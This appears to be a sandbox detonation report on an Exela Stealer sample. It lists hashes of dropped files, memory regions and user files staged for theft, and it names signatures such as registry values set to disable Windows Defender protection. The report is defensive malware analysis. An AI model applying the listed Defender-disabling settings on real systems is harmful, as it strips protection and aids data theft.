| SHA512 | 07e9d0cc5e5b4850adb5aa83466b7acd6854a6e8e230ad8e5eb63a4bc52ec1ed24536ddff025d8a65cccd8e00df326ea9338bfea30abb2942fca3979ca30c642 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-rtlsupport-l1-1-0.dll
| MD5 | a63de0416788e90cab093393edccb1b3 |
| SHA1 | 9d1f572ea39403916703864a690fe9c3affbbe5a |
| SHA256 | 02fd3b0adf86967b6fc133797c12fa9ee8d0cf64778b5ca937b56e86ac726343 |
| SHA512 | 06a257fbfb7e70ea2f55789b258a29fb7df5bc1d5baf195da2fd4d03a96e3e634565f8b762e7f76376cefba500de71dba114fbb661ac70ba7a16ab6b149abbe6 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-profile-l1-1-0.dll
| MD5 | bf23831af3f7be93a8026b66a8c920ab |
| SHA1 | 07efccb8cc2cf29f40d54caf358559a31b99c46c |
| SHA256 | cac8fb2938ed80bd7eed42e3c68dead6cb41c30cfb567f23085986422f1a2747 |
| SHA512 | b8937b1c4039f2e08088f92d2a491c76c6720a0072c92b261ee3b8ce403a4cb6c5a6bedfded93414b6212e6a5a943c78e15a32c0c603e6741c1d5d76554d1c39 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 17aa74d08778d62a946f62f0ca9583d3 |
| SHA1 | 06dea29dd28457783b753be4e28cb16fe6eb1e2a |
| SHA256 | 5c566535a9ac607fa99a665ab246ffb78767995dde86c4a9a5c518dd22b76e56 |
| SHA512 | dd69d76b2ac8524049d1ae23b241c25846a3f1f1a93e6884ce4acf2d3a9fa3ee94777a9924183b5b3a3b9de9008a3896bb88195c4e82c22d5a7f17e785dd8500 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-processthreads-l1-1-0.dll
| MD5 | ede66c159083ab6ec6d00a30d65fd13a |
| SHA1 | 2ea70c9681fa09647b69554c4b0e335446f4565a |
| SHA256 | 42f88e44e488a74af796e8c2a2548879764a40e554f35d1deb8eaff5def09e20 |
| SHA512 | c667e4658828f9df3a37e233994eab5f8dcb06542b68afe3a5ec520a30d09d2d8a4b76959777697a288a0eef90ab7b4b128c5e8193339118957f43e4e38c70ee |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-processenvironment-l1-1-0.dll
| MD5 | c4a0a79a0dcd0b407df304501c33ccd5 |
| SHA1 | 5e1dfa5e98634cad712d2711be3d3f0e5a671b95 |
| SHA256 | 3add350dcd79c64a98e47adf733f26c9fdf47df097b060f04f067cdaf32e99cc |
| SHA512 | acb737c371ff7ef187ad0ba0eb1c2d29aa7ae8d546ff74f998fbe6081349c8fc21b05b6c3b55a9cc28b9765161e50fffa0ea7af4a83f6c5ad34183c0cf10b582 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-namedpipe-l1-1-0.dll
| MD5 | e06db624dc643c0f8d9c1b640960689a |
| SHA1 | b1bf5159bb1aa7ed30288e5db4b8146be874c072 |
| SHA256 | 245cf5d5abc866d5ce327c4a1524ae3954ccfc9a7284c817fa15962695e6b6fa |
| SHA512 | a8176dad7540cb5ea8017ddd66626a3172fc2b22404d5bead434b60bb9df28c190ea51892df333fdec5e08819cf3bda3280096c930807cf0d375e5c6b0506c44 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-memory-l1-1-0.dll
| MD5 | a63629924496dfc53245605c47563798 |
| SHA1 | 0452471b1024711f99891340300657ec8d38fa75 |
| SHA256 | 9c5ea7a7e943c65da3aeff4da33b47fc4a3becea2f7a0b6aa2b632cd6d8b4632 |
| SHA512 | 072c2407224aba338dfb0c65fbdce30ee368f76fcc7d96f1e44d68a8ba98dae3647cfa3d4e1c51be8116fec210fdc36251c5f72d40ec5bb7b91e965f90aded72 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 578f22f3cfe28f68f21b4665d90d0fd5 |
| SHA1 | e4e3887f2f63eed765e4df6d65e2d599a94079db |
| SHA256 | e4011458af1397e26d0b233cbb2fa661faa6dae7b7a9541e9311c8af1ecb5e48 |
| SHA512 | 14902536b9325afa8e376458137373e22d7a6898164575be73c08ecd08df381a6dff1878e6995ee6956224a5a3f6df3746ae149f82e30bb136986c386ed4c792 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-libraryloader-l1-1-0.dll
| MD5 | 2a2e22f35b83aab6db3d7b27c5af1953 |
| SHA1 | 5531e1b2899d52cf44d92a521db503cfab6beb26 |
| SHA256 | 425e4ebee71347295e36776d415611d451e2a51b451df57da23ed8f8fb4664e8 |
| SHA512 | 269c09638fd5308d1719cb7af9132e0d158318a1b76a9a16495619ca6dbb8f1370af0d76fc709ea9c6f14064390161cda19f53ad240dc646b065ab8056e3049a |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-interlocked-l1-1-0.dll
| MD5 | ee5bb5fc7b94b7413b9f4ade5dcd404e |
| SHA1 | 6d615205f7d44cf0a77e7d943d33a2915bd636d8 |
| SHA256 | 22cf7040d9cb3dc79d941a6bbe4cebd5beaa1355d6e424843e6970404281e61e |
| SHA512 | 954d5b6a51334eb1a602aa35f29a2c84a025438784f77d5f4c96d465cd5cf1229dd55edf1c3faa14edae5f25ed74dbc175a143d8ed93ee24f98c0fe678569031 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-heap-l1-1-0.dll
| MD5 | cdd1ef7807185eeee2d5ac3bae51bdd5 |
| SHA1 | 441b7dcc090f6e2552b7b70c75ffeae96cf3448d |
| SHA256 | 6d14b49e8e21de08b9fa778f15c259dbd4feb9b54eb628d69bd50e5c86aa65a5 |
| SHA512 | ae57c48830cf4b0dd577e3bf5353defc9420814f340589eccfb7419d82c6459bb6a6b4163f57642407e3fc35e35f9a0a9c2ff3029e024c27e20ad20019cf0982 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-handle-l1-1-0.dll
| MD5 | 517b80a416198dcfc9a1572625819506 |
| SHA1 | 589fb8ae55c87dde75bbfc5bef4f29edb66cb44e |
| SHA256 | 2783b85d98f4a92faf67a94fc04e9c2f6786627949984828d14deab1682bbe3f |
| SHA512 | 1c7d4b693a42a14c25eb1060c8d6735e1d6d2d6db934f5f3a7dd67bd82c3be3ea3bbb6ea0b98ac1ab15e7ba393d76140012f7eaabb9d0577f965fd8b40487d4f |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-file-l2-1-0.dll
| MD5 | 50abf0a7ee67f00f247bada185a7661c |
| SHA1 | 0cddac9ac4db3bf10a11d4b79085ef9cb3fb84a1 |
| SHA256 | f957a4c261506484b53534a9be8931c02ec1a349b3f431a858f8215cecfec3f7 |
| SHA512 | c2694bb5d103baff1264926a04d2f0fe156b8815a23c3748412a81cc307b71a9236a0e974b5549321014065e393d10228a0f0004df9ba677f03b5d244a64b528 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-file-l1-2-0.dll
| MD5 | 8ad4771e23185cb7672f71ec16c580cf |
| SHA1 | a7cd8fe0df07820296bb53700d0698f2dc042247 |
| SHA256 | b153ff5d667c8297776f21c5f440cff28c3e3a5b1f748fd4700306e1fb283ed8 |
| SHA512 | 0f976083c020f683643b7ecd5fe15b3997df4c6508bf5b2f40a920ee53cd153d969c09e3207d11759a2b60bfb21adeee9ccea2d122c4ae9852ff6fed2fd88ef2 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-file-l1-1-0.dll
| MD5 | bcc620dcc9a3a9dfd38663a971b7044b |
| SHA1 | 8e24ffcc313522f908b90c763c3b31debc57be84 |
| SHA256 | f73000652ca7ca7468ca6134663c99cbaf7bd97740bdbdd5d1e1e23ccfd5db75 |
| SHA512 | 39a18ae66346d86b68629129856ad18d06dce8993d8133d7bd2d6b90b46825d76775ef29938c15bac88d7732d0d8db039f64ac944e45c40ece6d7ec6ae4adf10 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-fibers-l1-1-0.dll
| MD5 | 824a1932c5c58891152ae1de02eef652 |
| SHA1 | 5d864e1f6a664ebcc004b0465cf9bfb8f964d18f |
| SHA256 | 83ecd4fc05c5603621ab687657b8862175025c9910f8dc1b23135d2350dd9219 |
| SHA512 | b965b9a8e952018f243eaacc933701ac6c8fea4a5dfee55153cd54bfd8749227fb6c459852c5f4fdef509c9ba73ed81a28369dcd89818906788a57cc92e204ce |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-errorhandling-l1-1-0.dll
| MD5 | a538b281f8e84cecdac507c73a43d744 |
| SHA1 | 8d5979e196eaeeeda5639b2a848068bfad4bd7bc |
| SHA256 | 45afaf08d1cd7e43ac5ded47ed5fd708b86e835a9470c81e8130ed6955b84db8 |
| SHA512 | edc3cf93ef5b6291aac523a0d68c7e7df4b818378b82247cf7361474df5a75a17ad87c98f49a4f7dfd7f89948fb5c11152d4065abbb0b8533af38c562fef99a1 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-debug-l1-1-0.dll
| MD5 | 7dc2026abedaa10841eae4129ef1a9ae |
| SHA1 | e1e48d02c970960ac50c012a5ad72e4834dd7f42 |
| SHA256 | e83d5e5eb772070999f34a214ebffcf0a6068ebc1c4b4f1991188448f323808d |
| SHA512 | 05e8431692813e831947e941e6852b70e17e26352aa4e3a0f3cedefb241caee71a907fdd4855762dfaf3122dc8fb5e9a22c27b6dfe6e4473f23685cfd3c0a5cf |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-datetime-l1-1-0.dll
| MD5 | 1dc5b99c16502d75dd924eeda562461c |
| SHA1 | 6fe83ffc232c732cb513cecdd60d91c3d051d494 |
| SHA256 | 4e08856ff5203592c27f943f5586d2214b7c5dacde1b1ef75c2316590ab788c9 |
| SHA512 | 054cdadb09cf6816f1914c2607dfee9f0d56e1c9fb79ce91f84906f67c177a42036e39eec31318ac788512d8881af8a48754c5f77bac3422c4480bf019da4527 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\api-ms-win-core-console-l1-1-0.dll
| MD5 | 1bebd9b65ed18b680f7e39bef09fe6ce |
| SHA1 | b9dddcd699effcd6714c3cf7320d2389674bbdd7 |
| SHA256 | e756f6970905657cf73ecb3f57bae55a67be29afa75ae4d16046b0f7229708eb |
| SHA512 | 5cf255b9ffabde7713ae84278049135a64b02b0576f556d5b31bfd5091f779245f354a42a17cdbfaf14e91f856843f12ff556eb216a538592c704f41804f6172 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\_ctypes.pyd
| MD5 | b4c41a4a46e1d08206c109ce547480c7 |
| SHA1 | 9588387007a49ec2304160f27376aedca5bc854d |
| SHA256 | 9925ab71a4d74ce0ccc036034d422782395dd496472bd2d7b6d617f4d6ddc1f9 |
| SHA512 | 30debb8e766b430a57f3f6649eeb04eb0aad75ab50423252585db7e28a974d629eb81844a05f5cb94c1702308d3feda7a7a99cb37458e2acb8e87efc486a1d33 |
C:\Users\Admin\AppData\Local\Temp\_MEI15562\python3.dll
| MD5 | 34e49bb1dfddf6037f0001d9aefe7d61 |
| SHA1 | a25a39dca11cdc195c9ecd49e95657a3e4fe3215 |
| SHA256 | 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281 |
| SHA512 | edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856 |
memory/6092-213-0x00007FFF504A0000-0x00007FFF50815000-memory.dmp
memory/6092-212-0x00007FFF503E0000-0x00007FFF50498000-memory.dmp
memory/6092-211-0x00007FFF626A0000-0x00007FFF626CE000-memory.dmp
memory/6092-210-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp
memory/6092-216-0x00007FFF62DD0000-0x00007FFF62DE2000-memory.dmp
memory/6092-215-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp
memory/6092-214-0x00007FFF62650000-0x00007FFF62674000-memory.dmp
memory/6092-218-0x00007FFF614A0000-0x00007FFF614B4000-memory.dmp
memory/6092-222-0x00007FFF5F5F0000-0x00007FFF5F60E000-memory.dmp
memory/6092-221-0x00007FFF625A0000-0x00007FFF625B9000-memory.dmp
memory/6092-220-0x00007FFF5F5D0000-0x00007FFF5F5E9000-memory.dmp
memory/6092-219-0x00007FFF4B100000-0x00007FFF4B21C000-memory.dmp
memory/6092-217-0x00007FFF62680000-0x00007FFF6269C000-memory.dmp
memory/6092-234-0x00007FFF50290000-0x00007FFF502A8000-memory.dmp
memory/6092-240-0x00007FFF63250000-0x00007FFF6325A000-memory.dmp
memory/6092-243-0x00007FFF4B340000-0x00007FFF4B358000-memory.dmp
memory/6092-242-0x00007FFF503E0000-0x00007FFF50498000-memory.dmp
memory/6092-244-0x00007FFF4A470000-0x00007FFF4AD11000-memory.dmp
memory/6092-241-0x00007FFF626A0000-0x00007FFF626CE000-memory.dmp
memory/6092-246-0x00007FFF4B300000-0x00007FFF4B337000-memory.dmp
memory/6092-245-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp
memory/6092-239-0x00007FFF4B360000-0x00007FFF4B38D000-memory.dmp
memory/6092-238-0x00007FFF50220000-0x00007FFF50231000-memory.dmp
memory/6092-237-0x00007FFF50240000-0x00007FFF50286000-memory.dmp
memory/6092-233-0x00007FFF62DF0000-0x00007FFF62E13000-memory.dmp
memory/6092-236-0x00007FFF52680000-0x00007FFF527F3000-memory.dmp
memory/6092-235-0x00007FFF504A0000-0x00007FFF50815000-memory.dmp
memory/3388-270-0x000001B1656F0000-0x000001B1656FE000-memory.dmp
memory/3388-271-0x000001B165720000-0x000001B16573A000-memory.dmp
memory/6092-328-0x00007FFF68640000-0x00007FFF6864D000-memory.dmp
memory/6092-327-0x00007FFF5F5D0000-0x00007FFF5F5E9000-memory.dmp
memory/6092-343-0x00007FFF4B360000-0x00007FFF4B38D000-memory.dmp
memory/6092-371-0x00007FFF68640000-0x00007FFF6864D000-memory.dmp
memory/6092-352-0x00007FFF52680000-0x00007FFF527F3000-memory.dmp
memory/6092-344-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp
memory/6092-364-0x00007FFF50240000-0x00007FFF50286000-memory.dmp
memory/6092-363-0x00007FFF50290000-0x00007FFF502A8000-memory.dmp
memory/6092-372-0x00007FFF4A470000-0x00007FFF4AD11000-memory.dmp
memory/6092-358-0x00007FFF62680000-0x00007FFF6269C000-memory.dmp
memory/6092-357-0x00007FFF62DD0000-0x00007FFF62DE2000-memory.dmp
memory/6092-356-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp
memory/6092-354-0x00007FFF504A0000-0x00007FFF50815000-memory.dmp
memory/6092-353-0x00007FFF626A0000-0x00007FFF626CE000-memory.dmp
memory/6092-345-0x00007FFF62650000-0x00007FFF62674000-memory.dmp
memory/4648-401-0x0000018CBC540000-0x0000018CBC548000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\BackupUnregister.ps1
| MD5 | 6a8bebf2a16e6465218d770b28ce394d |
| SHA1 | 9cae38e3749de50c5d1ea138684718fc70573413 |
| SHA256 | d80cc4c9fb7ae3bf92b91f928a7331465cb966e8afae897771703e9c5d6ce93c |
| SHA512 | 270240732a339f7f81655e01d952dd9c5c19acf9f7af08a0b89a80218e497fd142d7cee8d90d9a9aa588e8d78b89a6ebac502c42256863501d0b19235665e41e |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UnblockRestart.jpg
| MD5 | e348b888683bda64447f58f3ade23d21 |
| SHA1 | 7224f7bb8a8f930742390cdb1c3d047e62fb7416 |
| SHA256 | bfd8018670e5da94aece870013decd7ac03f53c3db99a4eed2771545af5c5d24 |
| SHA512 | fed41a99144a0392049e5614d53e68b63af10933028fd8457b14d3be73d12272ce0df1d29f913d005ac8c1f95e5dfdb9375f7456d870b2fbf13022599374e35b |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\PingPush.docx
| MD5 | d627a5380513d6972baecf93f1358713 |
| SHA1 | 900a4df5fbb0171a6733a28314602c50fa70b93e |
| SHA256 | 20af230f76c44180815ae9c89efde092eab70f0d04d93c9c8f23eb6cf5d3ae37 |
| SHA512 | 56fca62ccf75e9c562de46b7f2d0e35e087d9706c74c812971e9aa3ef11ad3b2757bebb8d736d29d9d03911dc2783035944a6a41ce2661a6c82a227e79fd31ba |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\FormatGroup.mp3
| MD5 | 5951d52a110fd6b4e82d66275329583a |
| SHA1 | 210ec941af93d4c8d70cfa9627329ab3cce2ae6b |
| SHA256 | 4a53bd86afa06ef60f141745778dea32a9833faee3687340c468f93c12d9d658 |
| SHA512 | c1f3ba0ade9803e084d049a4124184e13a3bee634d23c4cf9fe022f335fd6abfd70d21f00d1d2c5c8d291e3be4617d198532d02640bd98e139614a9bfa439b13 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\ExitReceive.xlsx
| MD5 | 70b9c07179d78343509843362d44eb11 |
| SHA1 | dffa733fa2169c072992aea9df7d15016cf1f0fa |
| SHA256 | 28cf318291213c2aa39279d8f982ca0cec1fef6dc76fc4a860323f63a64ab425 |
| SHA512 | deceaab830b4273c3d438b0079153617a6ea7912535152a1344e30f84d8bd4c0480c9d087b6abd32be4da8a43410b70ff11be4488875a1575adf324d5118b7c0 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\CopySplit.xlsx
| MD5 | d8886bbb87508b05717cfa91fe597531 |
| SHA1 | cdb31f6ba9f3bafb0688dd45f0e85d4119ed65ac |
| SHA256 | 8939b645941f3cc5dc07f5cd3e11c93e174e107eedebb74b1f244d70ccaf88ac |
| SHA512 | 3a0485e8f3a10e57b2e56cdf740017453aae0523fbb7f779c1cf27879f5b584d1d63c62ade3c8b3baec9fb31b7b01291cce52c0b3f9206d6745f03b7bb0a0ee1 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UninstallTest.xlsx
| MD5 | b33cf5c0d21fc61c18274e8a8861629a |
| SHA1 | a7bc42b617006307ba452aeff5fa4576220f2267 |
| SHA256 | 3f64d5b6188dc169a593a8ac5dcf59cb94f30ea27f5734c152d1a52f5c18c854 |
| SHA512 | fff4f259e4aaa5657f881d842f510f74b93d914b580757f979f5dc5b66215c655a3796bd0e646e89e55fd68334f179021f95ca0323c132efd55fcdd8983c953d |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UnlockHide.txt
| MD5 | 315adb1db72d7ecf7c37245a15f78c60 |
| SHA1 | 694e5d9a4d22033579b07ee158bdb5ceb73c4676 |
| SHA256 | 0a624564385245c9e9de2969d645a13d9b825c7d573c29d70fd5922c907a5c7d |
| SHA512 | aafeee2933cb48b4f8d8cea171f68d9ac566c12d3e964c7daa63721e780f846c505dce86399bb2e37fa692323c1d5c54508668c732e8fcb6bbba3c5e3b4db1a0 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\RepairTest.xls
| MD5 | fd43ae96e6a386615ac2585f511799fe |
| SHA1 | 9b44d6e7ed5e9509e5a9f0f9967539ad25acc947 |
| SHA256 | 88c2fde8afb939f2a4c0b5141162e955917fdd60a9bd8cfe3bd1a67d75c39405 |
| SHA512 | 7217fc50b18570c3d9726bea41492021c84a3b0add6f5d620476493894890c4fcdaa48e6ee8a064ce65748f08932281bcc4f627b2a255c880034dbc1a6f59042 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\BackupPush.vsdm
| MD5 | 5eaa3480bd748cd957b1b5fc9be4fe64 |
| SHA1 | c205980b01013f15d05c8fd5e9f106faf762ec85 |
| SHA256 | 586ede8aa2c1ed7b4a766e03cf0230c6bc07f0bc56413097a864977d3c6d0829 |
| SHA512 | d3fe37d1981f8b48a4cb5e7f18aa83f2ed27a40ca912c6870098fbe156c1b8f1307a6ca2dd73e0b460a751e8d379861c9b96fa289150412d9a3a25dc93023b2c |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\TestUninstall.docx
| MD5 | c78a81d6b7e82cdca6d6bf0819347ea8 |
| SHA1 | 5c6a0a165089f26f71cf49040c28cc304bf4d7a0 |
| SHA256 | 240cb036a653e9095b13f6ae676ce2a50c1f925c020664b42adf00b6af8c69a8 |
| SHA512 | 2ee92cf707dfd7a2334e2f2fce18c3b873d6cfdc65d36d1437d516c1d4112867ae71df1b7cb534b4a75ab763748d93c7339cc96499f34dcc3f2d2fb391db2df3 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Music\CompressTrace.jpg
| MD5 | 1221184ceb8f48bc7afbf8686c1099af |
| SHA1 | 840fd3fba8e1b5fc2d85f195089c98e0efd838ff |
| SHA256 | 1006fc462b4b7fc8cc39e66164768776f267c213baa84f1cfbc4d37426423b36 |
| SHA512 | 2ca3bd0a07cf570a8f6d3d191828fd85e93bcd5864bac75824a866a260bcc685903113907e52884fd8abffbdd1192f313408f21244a68d663cf87a261c5d29b6 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\RestoreUndo.docx
| MD5 | 756c3a7c0beba2b0e8baf0568e49b94d |
| SHA1 | 0f7a8d8443d59dbdebdb06128f36133017eaf4ee |
| SHA256 | 21dc7e83e8ea881bbd033b89dfefe1bed14cbce175f90ccec646b4daf17a095f |
| SHA512 | 8500c352e9f14968bedc5e415a512d90b274a41a7202cebd4b953e95d1a03962545e4d923b00301c0a336ff0029e3f46416fda0fbe059626ad60abaff3e7cfe3 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\InitializeBlock.xlsx
| MD5 | 08fbd16c63a4c9be2bda0887f201d354 |
| SHA1 | c84041c956439c762b48f19c97787ddfbe2fba8b |
| SHA256 | 93dfb80bc5279d444efc0f215dd67b04b5acd7df951b27abf104cf2903707bf9 |
| SHA512 | 8a3226a7460c8eb61032248505843849cbfce77e63b8604bdecc92b885607ca9220d5905213017294b53ed31167877dd452dc5cc6fda7cf075ee70fde02ffae1 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\GrantFormat.xlsx
| MD5 | 68c7562b2c370917810adae5c05a5592 |
| SHA1 | b5701994996f8b8408679d0cb38e62884c4bdad6 |
| SHA256 | 6fad69e9ead3552e9cde24fdb38a657c3f94fd4d435853206d2faf9854c2a31e |
| SHA512 | 5d63c170138ef76e0b968a87ef985dd8567b9be6d2f2e607e45a8b9f0f1196a9fbdef62d1502aee385a1435ea2270f714ebf7290cc0b15226dc21a2164a4664b |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UseUnpublish.png
| MD5 | 3b3339ad8c8f0f7257893f484699d8f2 |
| SHA1 | fa0a890442175d10d54eb37622bc0642536fdb7e |
| SHA256 | ae866eac56922fc173c91fba8f355c8a63fb215f97f017a12cfe81597a408a66 |
| SHA512 | 1be6e0f7307b2338dd80e6675dd1829a737671522af7d63504a6cf1397b764805ff6d940c47724d02cbf217bc3b55a3f94abd076d4fa0ba4be487e5efb3a7dc8 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\PushBlock.jpg
| MD5 | 7726aeaa4deee4e98c0225c29dc8978f |
| SHA1 | 1f04e48ed5e04f177775497c9b252930518ed35b |
| SHA256 | 299af8ad7a4067d373f034cce8176d2defb2431c5848dec3a5181f46361d32ef |
| SHA512 | e983c5633951f474cd887835b9eef3f55462d1e332c0147f89698465cf180fe56d29f06cbefb6fc4bd2e4df04294174503ea868accc2fb89760868a1d7f7c810 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\My Wallpaper.jpg
| MD5 | a51464e41d75b2aa2b00ca31ea2ce7eb |
| SHA1 | 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d |
| SHA256 | 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f |
| SHA512 | b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\CheckpointWatch.jpeg
| MD5 | db8d7d1edcadf7aefd57bff59187338e |
| SHA1 | fe408a50a4012f043b0d4285aeabb5a2beed3a22 |
| SHA256 | 683e3c5ef6dd87273b0c89a79fdb87e0874bdcec1f76228b4ce02e3d56c2e874 |
| SHA512 | ccb1549e8ca8fa1e6d5be1551954102a0d6b5efc3fa947758d107bdc20f59ddf393b0c2edcdca265d311d42d35a88d65fb9fa63ad84de91f13fc8c6386022ce4 |
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Music\StepUpdate.mp3
| MD5 | df5ba7c5a5bd6f276fafc598bd1728f6 |
| SHA1 | 248a3ec12d736753504723d1f406111683996dca |
| SHA256 | a1c89cf1b768b28e390f01b0d601639d93a1693929c57f2d71e08ed0fb546ef3 |
| SHA512 | 56596f8e95f39404e0530115833f0fe731173f19b5098faab62de4a9c291900665c5dd4cf12c73349fd133ed8a18e3f4664ec59d0cb915f0dca8f9da6e4ac56b |
memory/6092-581-0x00007FFF50240000-0x00007FFF50286000-memory.dmp
memory/6092-580-0x00007FFF50290000-0x00007FFF502A8000-memory.dmp
memory/6092-573-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp
memory/6092-561-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp
memory/6092-570-0x00007FFF626A0000-0x00007FFF626CE000-memory.dmp
memory/6092-609-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp
memory/6092-647-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp
memory/6092-659-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp
memory/6092-713-0x00007FFF4B100000-0x00007FFF4B21C000-memory.dmp
memory/6092-735-0x00007FFF503E0000-0x00007FFF50498000-memory.dmp
memory/6092-740-0x00007FFF5F5F0000-0x00007FFF5F60E000-memory.dmp
memory/6092-739-0x00007FFF50220000-0x00007FFF50231000-memory.dmp
memory/6092-738-0x00007FFF62680000-0x00007FFF6269C000-memory.dmp
memory/6092-737-0x00007FFF62DD0000-0x00007FFF62DE2000-memory.dmp
memory/6092-736-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp
memory/6092-734-0x00007FFF626A0000-0x00007FFF626CE000-memory.dmp
memory/6092-733-0x00007FFF614A0000-0x00007FFF614B4000-memory.dmp
memory/6092-732-0x00007FFF62DF0000-0x00007FFF62E13000-memory.dmp
memory/6092-731-0x00007FFF50240000-0x00007FFF50286000-memory.dmp
memory/6092-730-0x00007FFF62620000-0x00007FFF6264D000-memory.dmp
memory/6092-729-0x00007FFF52680000-0x00007FFF527F3000-memory.dmp
memory/6092-728-0x00007FFF62E20000-0x00007FFF62E39000-memory.dmp
memory/6092-727-0x00007FFF62650000-0x00007FFF62674000-memory.dmp
memory/6092-726-0x00007FFF68650000-0x00007FFF6865F000-memory.dmp
memory/6092-725-0x00007FFF625A0000-0x00007FFF625B9000-memory.dmp
memory/6092-724-0x00007FFF68640000-0x00007FFF6864D000-memory.dmp
memory/6092-723-0x00007FFF4B300000-0x00007FFF4B337000-memory.dmp
memory/6092-721-0x00007FFF4B340000-0x00007FFF4B358000-memory.dmp
memory/6092-720-0x00007FFF63250000-0x00007FFF6325A000-memory.dmp
memory/6092-719-0x00007FFF4B360000-0x00007FFF4B38D000-memory.dmp
memory/6092-716-0x00007FFF50290000-0x00007FFF502A8000-memory.dmp
memory/6092-715-0x00007FFF5F5D0000-0x00007FFF5F5E9000-memory.dmp
memory/6092-707-0x00007FFF504A0000-0x00007FFF50815000-memory.dmp
memory/6092-703-0x00007FFF63600000-0x00007FFF6360D000-memory.dmp
memory/6092-722-0x00007FFF4A470000-0x00007FFF4AD11000-memory.dmp
memory/6092-697-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-06-30 18:07
Reported
2025-06-30 18:09
Platform
win11-20250619-en
Max time kernel
100s
Max time network
104s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Exela Stealer
Exelastealer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Grants admin privileges
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
